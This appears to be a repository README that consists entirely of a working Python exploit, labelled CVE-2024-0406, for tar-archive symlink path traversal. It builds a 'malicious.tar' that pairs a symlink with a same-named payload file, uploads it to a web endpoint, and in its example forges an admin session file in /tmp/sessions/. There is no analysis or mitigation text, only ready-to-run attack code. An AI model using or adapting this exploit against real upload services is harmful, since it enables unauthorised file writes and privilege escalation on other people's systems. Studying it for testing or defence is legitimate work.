README.md
Rendering markdown...
import os
import tarfile
import io
import requests
from typing import Optional, Dict
class SymlinkArchiveExploit:
def __init__(
self,
target_path: str,
payload_data: str,
symlink_name: str = "symlink_pyld",
archive_name: str = "malicious.tar"
):
"""
Initialize the exploit generator
:param target_path: Target path for symlink traversal
:param payload_data: Data to write to the target file
:param symlink_name: Name for the symlink/payload file
:param archive_name: Output filename for the malicious archive
"""
self.target_path = target_path
self.payload_data = payload_data
self.symlink_name = symlink_name
self.archive_name = archive_name
def create_malicious_archive(self) -> bool:
"""
Create a tar archive containing both a symlink and payload file
:return: True if creation succeeded, False otherwise
"""
try:
with tarfile.open(self.archive_name, "w") as tar:
# Create symlink entry
symlink_info = tarfile.TarInfo(name=self.symlink_name)
symlink_info.type = tarfile.SYMTYPE
symlink_info.linkname = self.target_path
tar.addfile(symlink_info)
# Create payload file with same name as symlink
payload_info = tarfile.TarInfo(name=self.symlink_name)
payload_info.size = len(self.payload_data)
tar.addfile(payload_info, io.BytesIO(self.payload_data.encode('utf-8')))
return True
except Exception as e:
print(f"Error creating archive: {str(e)}")
return False
def upload_archive(
self,
upload_url: str,
cookies: Optional[Dict] = None,
headers: Optional[Dict] = None
) -> bool:
"""
Upload the generated archive to a target endpoint
:param upload_url: Full URL for upload endpoint
:param cookies: Optional cookies for authenticated requests
:param headers: Optional custom headers
:return: True if upload succeeded, False otherwise
"""
try:
with open(self.archive_name, 'rb') as f:
files = {'archive': (self.archive_name, f, 'application/x-tar')}
response = requests.post(
upload_url,
files=files,
cookies=cookies,
headers=headers
)
if response.status_code == 200:
print("Upload successful")
return True
print(f"Upload failed: {response.status_code} - {response.text}")
return False
except Exception as e:
print(f"Upload error: {str(e)}")
return False
finally:
self.cleanup()
def cleanup(self) -> None:
"""Remove generated archive file"""
if os.path.exists(self.archive_name):
os.remove(self.archive_name)
print("Temporary files cleaned up")
if __name__ == "__main__":
# Example usage
exploit = SymlinkArchiveExploit(
target_path="/tmp/sessions/", # Target directory for Path Traversal eg. /tmp/sessions in this case
payload_data='{"username":"attacker","id":1,"role":"admin"}', # Value of the data to be written for eg. a json session json to gain admin role
symlink_name="symlink_pyld",
archive_name="malicious.tar"
)
if exploit.create_malicious_archive():
# Example upload configuration
exploit.upload_archive(
upload_url="http://localhost:1337/user/upload",
cookies={"session": "cookieValid"}, # Add session cookies if needed
headers={"User-Agent": "CVE-2024-0406 Client"} # Add user-agent or any other headers needed on the upload request!
)